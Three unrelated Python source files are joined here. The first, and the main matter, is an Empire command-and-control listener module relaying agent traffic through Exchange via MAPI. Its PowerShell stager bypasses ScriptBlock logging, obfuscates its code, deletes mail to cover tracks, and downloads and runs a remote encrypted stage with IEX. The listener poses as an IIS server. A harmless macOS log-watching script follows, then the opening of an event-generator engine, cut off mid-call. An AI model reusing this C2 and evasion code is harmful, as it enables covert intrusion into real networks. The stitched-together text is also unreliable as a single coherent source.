from lib.common import helpers
from lib.common import agents
from lib.common import encryption
from lib.common import packets
from lib.common import messages
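# Empire listener module: an HTTP[S] listener whose agent traffic is relayed through an
# Exchange mailbox via MAPI (see the Liniaal project referenced in self.info below).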
class Listener:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'HTTP[S] + MAPI',
'Author': ['@harmj0y','@_staaldraad'],
'Description': ('Starts a http[s] listener (PowerShell) which can be used with Liniaal for C2 through Exchange'),
'Category' : ('client_server'),
'Comments': ['This requires the Liniaal agent to translate messages from MAPI to HTTP. More info: https://github.com/sensepost/liniaal']
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Name' : {
'Description' : 'Name for the listener.',
'Required' : True,
'Value' : 'mapi'
},
'Host' : {
'Description' : 'Hostname/IP for staging.',
'Required' : True,
'Value' : "http://%s:%s" % (helpers.lhost(), 80)
},
'BindIP' : {
'Description' : 'The IP to bind to on the control server.',
'Required' : True,
'Value' : '0.0.0.0'
},
'Port' : {
'Description' : 'Port for the listener.',
'Required' : True,
'Value' : 80
},
'StagingKey' : {
'Description' : 'Staging key for initial agent negotiation.',
'Required' : True,
'Value' : '2c103f2c4ed1e59c0b4e2e01821770fa'
},
'DefaultDelay' : {
'Description' : 'Agent delay/reach back interval (in seconds).',
'Required' : True,
'Value' : 0
},
'DefaultJitter' : {
'Description' : 'Jitter in agent reachback interval (0.0-1.0).',
'Required' : True,
'Value' : 0.0
},
'DefaultLostLimit' : {
'Description' : 'Number of missed checkins before exiting',
'Required' : True,
'Value' : 60
},
'DefaultProfile' : {
'Description' : 'Default communication profile for the agent.',
'Required' : True,
'Value' : "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
},
'CertPath' : {
'Description' : 'Certificate path for https listeners.',
'Required' : False,
'Value' : ''
},
'KillDate' : {
'Description' : 'Date for the listener to exit (MM/dd/yyyy).',
'Required' : False,
'Value' : ''
},
'WorkingHours' : {
'Description' : 'Hours for the agent to operate (09:00-17:00).',
'Required' : False,
'Value' : ''
},
'ServerVersion' : {
'Description' : 'The Server header for the control server.',
'Required' : True,
'Value' : 'Microsoft-IIS/7.5'
},
'Folder' : {
'Description' : 'The hidden folder in Exchange to use',
'Required' : True,
'Value' : 'Liniaal'
},
'Email' : {
'Description' : 'The email address of our target',
'Required' : False,
'Value' : ''
}
}
# required:
self.mainMenu = mainMenu
self.threads = {}
# optional/specific for this module
self.app = None
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
# set the default staging key to the controller db default
self.options['StagingKey']['Value'] = str(helpers.get_config('staging_key')[0])
def default_response(self):
"""
Returns a default HTTP server page.
"""
page = "<html><body><h1>It works!</h1>"
page += "<p>This is the default web page for this server.</p>"
page += "<p>The web server software is running but no content has been added, yet.</p>"
page += "</body></html>"
return page
def validate_options(self):
"""
Validate all options for this listener.
"""
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
for key in self.options:
if self.options[key]['Required'] and (str(self.options[key]['Value']).strip() == ''):
print helpers.color("[!] Option \"%s\" is required." % (key))
return False
return True
def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default', proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='', listenerName=None):
"""
Generate a basic launcher for the specified listener.
"""
if not language:
print helpers.color('[!] listeners/http generate_launcher(): no language specified!')
if listenerName and (listenerName in self.threads) and (listenerName in self.mainMenu.listeners.activeListeners):
# extract the set options for this instantiated listener
listenerOptions = self.mainMenu.listeners.activeListeners[listenerName]['options']
host = listenerOptions['Host']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
profile = listenerOptions['DefaultProfile']['Value']
uris = [a for a in profile.split('|')[0].split(',')]
stage0 = random.choice(uris)
if language.startswith('po'):
# PowerShell
stager = '$ErrorActionPreference = \"SilentlyContinue\";'
if safeChecks.lower() == 'true':
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
# ScriptBlock Logging bypass
stager += helpers.randomize_capitalization("$GPS=[ref].Assembly.GetType(")
stager += "'System.Management.Automation.Utils'"
stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
stager += "'cachedGroupPolicySettings','N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(").GetValue($null);If($GPS")
stager += "['ScriptB'+'lockLogging']"
stager += helpers.randomize_capitalization("){$GPS")
stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;"
stager += helpers.randomize_capitalization("$GPS")
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}"
stager += helpers.randomize_capitalization("Else{[ScriptBlock].\"GetFie`ld\"(")
stager += "'signatures','N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
stager += "};"
# set up the Outlook COM object and MAPI namespace used for C2
stager += helpers.randomize_capitalization('Add-Type -assembly "Microsoft.Office.Interop.Outlook";')
stager += "$outlook = New-Object -comobject Outlook.Application;"
stager += helpers.randomize_capitalization('$mapi = $Outlook.GetNameSpace("')
stager += 'MAPI");'
if listenerOptions['Email']['Value'] != '':
stager += '$fld = $outlook.Session.Folders | Where-Object {$_.Name -eq "'+listenerOptions['Email']['Value']+'"} | %{$_.Folders.Item(2).Folders.Item("'+listenerOptions['Folder']['Value']+'")};'
stager += '$fldel = $outlook.Session.Folders | Where-Object {$_.Name -eq "'+listenerOptions['Email']['Value']+'"} | %{$_.Folders.Item(3)};'
else:
stager += '$fld = $outlook.Session.GetDefaultFolder(6).Folders.Item("'+listenerOptions['Folder']['Value']+'");'
stager += '$fldel = $outlook.Session.GetDefaultFolder(3);'
# clear out all existing mails/messages
stager += helpers.randomize_capitalization("while(($fld.Items | measure | %{$_.Count}) -gt 0 ){ $fld.Items | %{$_.delete()};}")
# code to turn the key string into a byte array
stager += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(")
stager += "'%s');" % (stagingKey)
# this is the minimized RC4 stager code from rc4.ps1
stager += helpers.randomize_capitalization('$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};')
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='POWERSHELL', meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket)
# add the RC4 packet to a cookie
stager += helpers.randomize_capitalization('$mail = $outlook.CreateItem(0);$mail.Subject = "')
stager += 'mailpireout";'
stager += helpers.randomize_capitalization('$mail.Body = ')
stager += '"STAGE - %s"' % b64RoutingPacket
stager += helpers.randomize_capitalization(';$mail.save() | out-null;')
stager += helpers.randomize_capitalization('$mail.Move($fld)| out-null;')
stager += helpers.randomize_capitalization('$break = $False; $data = "";')
stager += helpers.randomize_capitalization("While ($break -ne $True){")
stager += helpers.randomize_capitalization('$fld.Items | Where-Object {$_.Subject -eq "mailpirein"} | %{$_.HTMLBody | out-null} ;')
stager += helpers.randomize_capitalization('$fld.Items | Where-Object {$_.Subject -eq "mailpirein" -and $_.DownloadState -eq 1} | %{$break=$True; $data=[System.Convert]::FromBase64String($_.Body);$_.Delete();};}')
stager += helpers.randomize_capitalization("$iv=$data[0..3];$data=$data[4..$data.length];")
# decode everything and kick it over to IEX to kick off execution
stager += helpers.randomize_capitalization("-join[Char[]](& $R $data ($IV+$K))|IEX")
if obfuscate:
stager = helpers.obfuscate(self.mainMenu.installPath, stager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode and ((not obfuscate) or ("launcher" not in obfuscationCommand.lower())):
return helpers.powershell_launcher(stager, launcher)
else:
# otherwise return the case-randomized stager
return stager
else:
print helpers.color("[!] listeners/http_mapi generate_launcher(): invalid language specification: only 'powershell' is currently supported for this module.")
else:
print helpers.color("[!] listeners/http_mapi generate_launcher(): invalid listener name specification!")
def generate_stager(self, listenerOptions, encode=False, encrypt=True, language="powershell"):
"""
Generate the stager code needed for communications with this listener.
"""
#if not language:
# print helpers.color('[!] listeners/http_mapi generate_stager(): no language specified!')
# return None
profile = listenerOptions['DefaultProfile']['Value']
uris = [a.strip('/') for a in profile.split('|')[0].split(',')]
stagingKey = listenerOptions['StagingKey']['Value']
host = listenerOptions['Host']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
folder = listenerOptions['Folder']['Value']
if language.lower() == 'powershell':
# read in the stager base
f = open("%s/data/agent/stagers/http_mapi.ps1" % (self.mainMenu.installPath))
stager = f.read()
f.close()
# make sure the server ends with "/"
if not host.endswith("/"):
host += "/"
# patch the server and key information
stager = stager.replace('REPLACE_STAGING_KEY', stagingKey)
stager = stager.replace('REPLACE_FOLDER', folder)
# patch in working hours if any
if workingHours != "":
stager = stager.replace('WORKING_HOURS_REPLACE', workingHours)
randomizedStager = ''
for line in stager.split("\n"):
line = line.strip()
# skip commented line
if not line.startswith("#"):
# randomize capitalization of lines without quoted strings
if "\"" not in line:
randomizedStager += helpers.randomize_capitalization(line)
else:
randomizedStager += line
# base64 encode the stager and return it
if encode:
return helpers.enc_powershell(randomizedStager)
elif encrypt:
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV+stagingKey, randomizedStager)
else:
# otherwise just return the case-randomized stager
return randomizedStager
else:
print helpers.color("[!] listeners/http generate_stager(): invalid language specification, only 'powershell' is currently supported for this module.")
def generate_agent(self, listenerOptions, language=None):
"""
Generate the full agent code needed for communications with this listener.
"""
if not language:
print helpers.color('[!] listeners/http_mapi generate_agent(): no language specified!')
return None
language = language.lower()
delay = listenerOptions['DefaultDelay']['Value']
jitter = listenerOptions['DefaultJitter']['Value']
profile = listenerOptions['DefaultProfile']['Value']
lostLimit = listenerOptions['DefaultLostLimit']['Value']
killDate = listenerOptions['KillDate']['Value']
folder = listenerOptions['Folder']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
b64DefaultResponse = base64.b64encode(self.default_response())
if language == 'powershell':
f = open(self.mainMenu.installPath + "./data/agent/agent.ps1")
code = f.read()
f.close()
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
commsCode = commsCode.replace('REPLACE_FOLDER',folder)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_powershell_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('$AgentDelay = 60', "$AgentDelay = " + str(delay))
code = code.replace('$AgentJitter = 0', "$AgentJitter = " + str(jitter))
code = code.replace('$Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', "$Profile = \"" + str(profile) + "\"")
code = code.replace('$LostLimit = 60', "$LostLimit = " + str(lostLimit))
code = code.replace('$DefaultResponse = ""', '$DefaultResponse = "'+str(b64DefaultResponse)+'"')
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',")
return code
else:
print helpers.color("[!] listeners/http_mapi generate_agent(): invalid language specification, only 'powershell' is currently supported for this module.")
def generate_comms(self, listenerOptions, language=None):
"""
Generate just the agent communication code block needed for communications with this listener.
This is so agents can easily be dynamically updated for the new listener.
"""
if language:
if language.lower() == 'powershell':
updateServers = """
$Script:ControlServers = @("%s");
$Script:ServerIndex = 0;
""" % (listenerOptions['Host']['Value'])
getTask = """
function script:Get-Task {
try {
# meta 'TASKING_REQUEST' : 4
$RoutingPacket = New-RoutingPacket -EncData $Null -Meta 4;
$RoutingCookie = [Convert]::ToBase64String($RoutingPacket);
# choose a random valid URI for checkin
$taskURI = $script:TaskURIs | Get-Random;
$mail = $outlook.CreateItem(0);
$mail.Subject = "mailpireout";
$mail.Body = "GET - "+$RoutingCookie+" - "+$taskURI;
$mail.save() | out-null;
$mail.Move($fld)| out-null;
# keep checking to see if there is response
$break = $False;
[byte[]]$b = @();
While ($break -ne $True){
foreach ($item in $fld.Items) {
if($item.Subject -eq "mailpirein"){
$item.HTMLBody | out-null;
if($item.Body[$item.Body.Length-1] -ne '-'){
$traw = $item.Body;
$item.Delete();
$break = $True;
$b = [System.Convert]::FromBase64String($traw);
}
}
}
Start-Sleep -s 1;
}
return ,$b
}
catch {
}
while(($fldel.Items | measure | %{$_.Count}) -gt 0 ){ $fldel.Items | %{$_.delete()};}
}
"""
sendMessage = """
function script:Send-Message {
param($Packets)
if($Packets) {
# build and encrypt the response packet
$EncBytes = Encrypt-Bytes $Packets;
# build the top level RC4 "routing packet"
# meta 'RESULT_POST' : 5
$RoutingPacket = New-RoutingPacket -EncData $EncBytes -Meta 5;
# $RoutingPacketp = [System.BitConverter]::ToString($RoutingPacket);
$RoutingPacketp = [Convert]::ToBase64String($RoutingPacket)
try {
# get a random posting URI
$taskURI = $Script:TaskURIs | Get-Random;
$mail = $outlook.CreateItem(0);
$mail.Subject = "mailpireout";
$mail.Body = "POSTM - "+$taskURI +" - "+$RoutingPacketp;
$mail.save() | out-null;
$mail.Move($fld) | out-null;
}
catch {
}
while(($fldel.Items | measure | %{$_.Count}) -gt 0 ){ $fldel.Items | %{$_.delete()};}
}
}
"""
return updateServers + getTask + sendMessage
else:
print helpers.color("[!] listeners/http_mapi generate_comms(): invalid language specification, only 'powershell' is currently supported for this module.")
else:
print helpers.color('[!] listeners/http_mapi generate_comms(): no language specified!')
def start_server(self, listenerOptions):
"""
Threaded function that actually starts up the Flask server.
"""
# make a copy of the currently set listener options for later stager/agent generation
listenerOptions = copy.deepcopy(listenerOptions)
# suppress the normal Flask output
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
bindIP = listenerOptions['BindIP']['Value']
host = listenerOptions['Host']['Value']
port = listenerOptions['Port']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
app = Flask(__name__)
self.app = app
@app.before_request
def check_ip():
"""
Before every request, check if the IP address is allowed.
"""
if not self.mainMenu.agents.is_ip_allowed(request.remote_addr):
dispatcher.send("[!] %s on the blacklist/not on the whitelist requested resource" % (request.remote_addr), sender="listeners/http")
return make_response(self.default_response(), 200)
@app.after_request
def change_header(response):
"Modify the default server version in the response."
response.headers['Server'] = listenerOptions['ServerVersion']['Value']
return response
@app.route('/<path:request_uri>', methods=['GET'])
def handle_get(request_uri):
"""
Handle an agent GET request.
This is used during the first step of the staging process,
and when the agent requests taskings.
"""
clientIP = request.remote_addr
dispatcher.send("[*] GET request for %s/%s from %s" % (request.host, request_uri, clientIP), sender='listeners/http')
routingPacket = None
cookie = request.headers.get('Cookie')
if cookie and cookie != '':
try:
# see if we can extract the 'routing packet' from the specified cookie location
# NOTE: this can be easily moved to a parameter, another cookie value, etc.
if 'session' in cookie:
cookieParts = cookie.split(';')
for part in cookieParts:
if part.startswith('session'):
base64RoutingPacket = part[part.find('=')+1:]
# decode the routing packet base64 value in the cookie
routingPacket = base64.b64decode(base64RoutingPacket)
except Exception as e:
routingPacket = None
pass
if routingPacket:
# parse the routing packet and process the results
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, routingPacket, listenerOptions, clientIP)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if results:
if results == 'STAGE0':
# handle_agent_data() signals that the listener should return the stager.ps1 code
# step 2 of negotiation -> return stager.ps1 (stage 1)
dispatcher.send("[*] Sending %s stager (stage 1) to %s" % (language, clientIP), sender='listeners/http')
stage = self.generate_stager(language=language, listenerOptions=listenerOptions)
return make_response(stage, 200)
elif results.startswith('ERROR:'):
dispatcher.send("[!] Error from agents.handle_agent_data() for %s from %s: %s" % (request_uri, clientIP, results), sender='listeners/http')
if 'not in cache' in results:
# signal the client to restage
print helpers.color("[*] Orphaned agent from %s, signaling retaging" % (clientIP))
return make_response(self.default_response(), 401)
else:
return make_response(self.default_response(), 200)
else:
# actual taskings
dispatcher.send("[*] Agent from %s retrieved taskings" % (clientIP), sender='listeners/http')
return make_response(results, 200)
else:
# dispatcher.send("[!] Results are None...", sender='listeners/http')
return make_response(self.default_response(), 200)
else:
return make_response(self.default_response(), 200)
else:
dispatcher.send("[!] %s requested by %s with no routing packet." % (request_uri, clientIP), sender='listeners/http')
return make_response(self.default_response(), 200)
@app.route('/<path:request_uri>', methods=['POST'])
def handle_post(request_uri):
"""
Handle an agent POST request.
"""
stagingKey = listenerOptions['StagingKey']['Value']
clientIP = request.remote_addr
# the routing packet should be at the front of the binary request.data
# NOTE: this can also go into a cookie/etc.
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, request.get_data(), listenerOptions, clientIP)
#print dataResults
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if results:
if results.startswith('STAGE2'):
# TODO: document the exact results structure returned
sessionID = results.split(' ')[1].strip()
sessionKey = self.mainMenu.agents.agents[sessionID]['sessionKey']
dispatcher.send("[*] Sending agent (stage 2) to %s at %s" % (sessionID, clientIP), sender='listeners/http')
# step 6 of negotiation -> server sends patched agent.ps1/agent.py
agentCode = self.generate_agent(language=language, listenerOptions=listenerOptions)
encryptedAgent = encryption.aes_encrypt_then_hmac(sessionKey, agentCode)
# TODO: wrap ^ in a routing packet?
return make_response(encryptedAgent, 200)
elif results[:10].lower().startswith('error') or results[:10].lower().startswith('exception'):
dispatcher.send("[!] Error returned for results by %s : %s" %(clientIP, results), sender='listeners/http')
return make_response(self.default_response(), 200)
elif results == 'VALID':
dispatcher.send("[*] Valid results return by %s" % (clientIP), sender='listeners/http')
return make_response(self.default_response(), 200)
else:
return make_response(results, 200)
else:
return make_response(self.default_response(), 200)
else:
return make_response(self.default_response(), 200)
try:
certPath = listenerOptions['CertPath']['Value']
host = listenerOptions['Host']['Value']
if certPath.strip() != '' and host.startswith('https'):
certPath = os.path.abspath(certPath)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath))
app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context)
else:
app.run(host=bindIP, port=int(port), threaded=True)
except Exception as e:
print helpers.color("[!] Listener startup on port %s failed: %s " % (port, e))
dispatcher.send("[!] Listener startup on port %s failed: %s " % (port, e), sender='listeners/http')
def start(self, name=''):
"""
Start a threaded instance of self.start_server() and store it in the
self.threads dictionary keyed by the listener name.
"""
listenerOptions = self.options
if name and name != '':
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
else:
name = listenerOptions['Name']['Value']
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
def shutdown(self, name=''):
"""
Terminates the server thread stored in the self.threads dictionary,
keyed by the listener name.
"""
if name and name != '':
print helpers.color("[!] Killing listener '%s'" % (name))
self.threads[name].kill()
else:
print helpers.color("[!] Killing listener '%s'" % (self.options['Name']['Value']))
self.threads[self.options['Name']['Value']].kill()
|
log-watch.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import glob
import os
import re
from threading import Thread
from time import sleep
from subprocess import call
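# Tails every file matching a path pattern and feeds each new line to a list of callbacks
# (print, macOS notifications, text-to-speech, ...). See the __main__ block at the bottom
# for an example configuration.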
class AbstractCallback(object):
u"""Absctract class for line callback.
Registred callback will be invked for every new line. If your action depends on more than one line, you have to
maintain state yourself.
"""
def __init__(self):
u"""Constructor. For now it's empty, but invoke this constructor for future compatibility."""
pass
def process_line(self, line, file_name):
u"""Function that will be called for every line"""
raise NotImplementedError
def blink_screen(self):
call("open -a BlinkScreen", shell=True)
def say(self, message):
say = "".join(["say '", message, "'"])
call(say, shell=True)
def notification(self, title, info):
notification = "".join(["osascript -e 'display notification \"", info, "\" with title \"", title, "\"'"])
call(notification, shell=True)
def play_sound(self, sound):
play = "".join(["afplay ", sound])
call(play, shell=True)
class SimpleFindLineAbstractCalback(AbstractCallback):
def __init__(self):
super(SimpleFindLineAbstractCalback, self).__init__()
def process_line(self, line, file_name):
needed_text = self.get_needed_text().lower()
if needed_text in line.lower():
print self.text_reaction()
def async_message():
self.async_reaction()
Thread(target = async_message).start()
def get_needed_text(self):
raise NotImplementedError
def text_reaction(self):
raise NotImplementedError
def async_reaction(self):
raise NotImplementedError
class LogWatch(object):
u"""Class for watching files. Can watch multiple files at once."""
def __init__(self, callbacks, path_pattern="./*.log", last_chars=0, refresh_delay=5):
u"""Constructor.
Callbacks - list of subclases of AbstractCallback.
path_pattern - unix style path pattenr.
last_chars - how many previous chars should be printed. If File is shorter, then will start form begining.
refresh_delay - ms between each refresh
"""
self.callbacks = callbacks
self.path_pattern = path_pattern
self.last_chars = last_chars
self.watched_files = dict()
self.last_file_name = ''
while True: # main loop
self.update_watched_files()
self.tail_for_files()
sleep(refresh_delay)
def update_watched_files(self):
u"""Function finds all files matching self.path_pattern.
If function detect any changes (new files or file name points to different phisical file), updates configuration.
"""
# Get files from unix style path regexp
files = glob.glob(self.path_pattern)
# Remove removed files
for key in list(self.watched_files):
if key not in files:
del self.watched_files[key]
# Generate file ids. Some log rotation mechanisms keep a constant name for the current file.
# We have to check whether the file name still points to the same file or to a new one.
files_stat = [(file_name, os.stat(file_name)) for file_name in files]
files_ids = [(file_name, self.file_id(stat)) for file_name, stat in files_stat]
# Add new files or reset configuration if known file name points to new file.
for file_name, fid in files_ids:
if file_name in self.watched_files:
watched = self.watched_files[file_name]
if fid != watched['fid']:
self.watched_files[file_name] = self.create_file_record(file_name, fid)
else:
self.watched_files[file_name] = self.create_file_record(file_name, fid)
@staticmethod
def file_id(stat):
u"""Generate a physical file identifier from an os.stat() result.
For rotating logs the current file sometimes keeps a constant name while a new physical file is created for
the known name; this identifier helps detect such changes.
"""
if os.name == 'posix':
return "%x-%x" % (stat.st_dev, stat.st_ino)
else:
return "%f" % stat.st_ctime
@staticmethod
def create_file_record(file_name, fid):
u"""File record for storing informactions about known files."""
return {
'name': file_name,
'fid': fid,
'new': True,
'last_pos': 0,
}
def tail_for_files(self):
u"""Method iterate over files, checking if there is something new."""
for file in self.watched_files.values(): # For every file
with open(file['name'], 'r') as f:
# Set the position from which to start.
# For a new file go to end - self.last_chars; if the file is shorter than self.last_chars, start from the beginning.
# For a known file, start from the last read position.
if file['new']:
try:
f.seek(0 - self.last_chars, 2) # move to end of file - last_chars
except IOError:
f.seek(0) # If the file is shorter, move to the beginning
else:
f.seek(file['last_pos'], 0) # move to the last read position
# Iterate every new line of current file
while True:
line = f.readline()
if line == '':
break
# Print a file header only if the previous content came from a different file
if self.last_file_name != file['name']:
self.last_file_name=file['name']
print
print '-----------------------------'
print file['name']
print
print
self.process_line(line, file)
# Update state
file['new'] = False
file['last_pos'] = f.tell()
def process_line(self, line, file):
u"""Call all callbacks for current line"""
for calback in self.callbacks:
calback.process_line(line, file['name'])
class PrintLineCallback(AbstractCallback):
u"""Just print every line. Sample callback, but usefull"""
def __init__(self):
super(PrintLineCallback, self).__init__()
def process_line(self, line, file_name):
print line.rstrip()
class ServerStartUpCallback(AbstractCallback):
u"""Inform when Tomcat server is up and running."""
terminal_message = "Server started in {}"
sound = "~/Library/Sounds/sfx_00001.aiff"
started_in = "You can work. It started in {}"
def __init__(self):
super(ServerStartUpCallback, self).__init__()
self.startup_pattern = re.compile('INFO: Server startup in (\d+) ms')
def process_line(self, line, file_name):
found = self.startup_pattern.search(line.strip())
if found is not None:
time_ms = found.group(1)
formated_time = self.format_time(time_ms)
print ServerStartUpCallback.terminal_message.format(formated_time)
# Executing all the commands grouped in this function takes some time.
# To avoid blocking the application, run them in a new thread.
def async_message():
self.notification("Platform is UP", ServerStartUpCallback.started_in.format(formated_time))
self.blink_screen()
# self.play_sound(ServerStartUpCallback.sound)
self.say("Server is UP! You can work!")
Thread(target = async_message).start()
def format_time(self, time):
u"""Format mili seconds to hours, minutes, seconds and miliseconds.
Use only values that are larger than 0 or any previous value was greater than 0"
"""
time = int(time)
mili_seconds = time % 1000
time = time // 1000
seconds = time % 60
time = time // 60
minutes = time % 60
time = time // 60
hours = time
result = ""
previous_appended = False
if hours > 0 or previous_appended:
result = "".join([result, " ", str(hours), "h"])
previous_appended = True
if minutes > 0 or previous_appended:
result = "".join([result, " ", str(minutes), "m"])
previous_appended = True
if seconds > 0 or previous_appended:
result = "".join([result, " ", str(seconds), "s"])
previous_appended = True
if mili_seconds > 0 or previous_appended:
result = "".join([result, " ", str(mili_seconds), "ms"])
previous_appended = True
if not previous_appended:
result = "".join([result, " 0ms"])
return result
class ShutDownCallback(SimpleFindLineAbstractCalback):
def __init__(self):
super(ShutDownCallback, self).__init__()
def get_needed_text(self):
return "<-- Wrapper Stopped"
def text_reaction(self):
return "Server is DONW!"
def async_reaction(self):
self.notification("Platform is DOWN!", "Platform is DOWN!")
self.blink_screen()
self.say("Server is down!")
class RestartingCallback(SimpleFindLineAbstractCalback):
def __init__(self):
super(RestartingCallback, self).__init__()
def get_needed_text(self):
return "JVM requested a restart."
def text_reaction(self):
return "Restarting Requested"
def async_reaction(self):
self.notification("Restarting Requested!", "Restarting Requested!")
self.say("Restarting requested!")
if __name__ == '__main__':
callback_list = [
PrintLineCallback(),
ServerStartUpCallback(),
ShutDownCallback(),
RestartingCallback(),
]
try :
LogWatch(callback_list, "log/tomcat/console-*.log")
except KeyboardInterrupt: # Without catching KeyboardInterrupt, ctrl+c results in an ugly stack trace.
print ""
print ""
print "BYE!"
print ""
|
eventgen_core.py
|
#!/usr/bin/env python
# encoding: utf-8
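# Core engine of Splunk Eventgen: loads the .conf configuration, dynamically loads
# output/generator/rater plugins, and runs timer, generator and output worker pools
# (threads or multiprocessing) that produce the configured event samples.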
import imp
import json
import logging
import logging.config
import os
import sys
import time
from Queue import Empty, Queue
from threading import Thread
from lib.eventgenconfig import Config
from lib.eventgenexceptions import PluginNotLoaded
from lib.eventgentimer import Timer
from lib.outputcounter import OutputCounter
lib_path_prepend = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'lib')
sys.path.insert(0, lib_path_prepend)
# Since I'm including a new library but external environments may not have access to pip (like Splunk embedded
# Python), I need to be able to load this library directly from src if it's not installed.
try:
import logutils
import logutils.handlers
except ImportError:
path_prepend = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'lib', 'logutils_src')
sys.path.append(path_prepend)
import logutils
import logutils.queue
file_path = os.path.dirname(os.path.realpath(__file__))
EVENTGEN_DIR = os.path.realpath(os.path.join(file_path, ".."))
EVENTGEN_ENGINE_CONF_PATH = os.path.abspath(os.path.join(file_path, "default", "eventgen_engine.conf"))
class JSONFormatter(logging.Formatter):
"""
Quick and dirty formatter that turns the log record into a simple JSON format
"""
def format(self, record):
message = record.msg
if not isinstance(message, dict):
# The record is probably a string
try:
message = json.loads(message)
except ValueError:
# Abort, just store the message as an attribute
message = {"message": message}
if "timestamp" not in message:
message["timestamp"] = super(JSONFormatter, self).formatTime(record, self.datefmt)
if "level" not in message:
message["level"] = logging.getLevelName(record.levelno)
return json.dumps(message)
class EventGenerator(object):
def __init__(self, args=None):
'''
This object will allow you to generate and control eventgen. It should be handed the parse_args object
from __main__ and will hand the argument object to the config parser of eventgen5. This will provide the
bridge to using the old code with the newer style. As things get moved from the config parser, this should
start to control all of the configuration items that are global, and the config object should only handle the
localized .conf entries.
:param args: __main__ parse_args() object.
'''
self.stopping = False
self.started = False
self.completed = False
self.config = None
self.args = args
self._setup_loggers(args=args)
# attach to the logging queue
self.logger.info("Logging Setup Complete.")
self._generator_queue_size = getattr(self.args, 'generator_queue_size', 500)
if self._generator_queue_size < 0:
self._generator_queue_size = 0
self.logger.info("set generator queue size to %d", self._generator_queue_size)
if self.args and 'configfile' in self.args and self.args.configfile:
self._load_config(self.args.configfile, args=args)
def _load_config(self, configfile, **kwargs):
'''
This method will use a configfile and set self.config to a processed config object;
kwargs will need to match eventgenconfig.py.
:param configfile:
:return:
'''
# TODO: The old eventgen had strange cli args. We should probably update the module args to match this usage.
new_args = {}
if "args" in kwargs:
args = kwargs["args"]
outputer = [key for key in ["keepoutput", "devnull", "modinput"] if getattr(args, key)]
if len(outputer) > 0:
new_args["override_outputter"] = outputer[0]
if getattr(args, "count"):
new_args["override_count"] = args.count
if getattr(args, "interval"):
new_args["override_interval"] = args.interval
if getattr(args, "backfill"):
new_args["override_backfill"] = args.backfill
if getattr(args, "end"):
new_args["override_end"] = args.end
if getattr(args, "multiprocess"):
new_args["threading"] = "process"
if getattr(args, "generators"):
new_args["override_generators"] = args.generators
if getattr(args, "disableOutputQueue"):
new_args["override_outputqueue"] = args.disableOutputQueue
if getattr(args, "profiler"):
new_args["profiler"] = args.profiler
if getattr(args, "sample"):
new_args["sample"] = args.sample
if getattr(args, "verbosity"):
new_args["verbosity"] = args.verbosity
self.config = Config(configfile, **new_args)
self.config.parse()
self._reload_plugins()
if "args" in kwargs and getattr(kwargs["args"], "generators"):
generator_worker_count = kwargs["args"].generators
else:
generator_worker_count = self.config.generatorWorkers
# TODO: Probably should destroy pools better so processes are cleaned.
self._setup_pools(generator_worker_count)
def _reload_plugins(self):
# Initialize plugins
# Plugins must be loaded before objects that do work, otherwise threads and processes generated will not have
# the modules loaded in active memory.
try:
self.config.outputPlugins = {}
plugins = self._initializePlugins(
os.path.join(file_path, 'lib', 'plugins', 'output'), self.config.outputPlugins, 'output')
self.config.validOutputModes.extend(plugins)
self._initializePlugins(
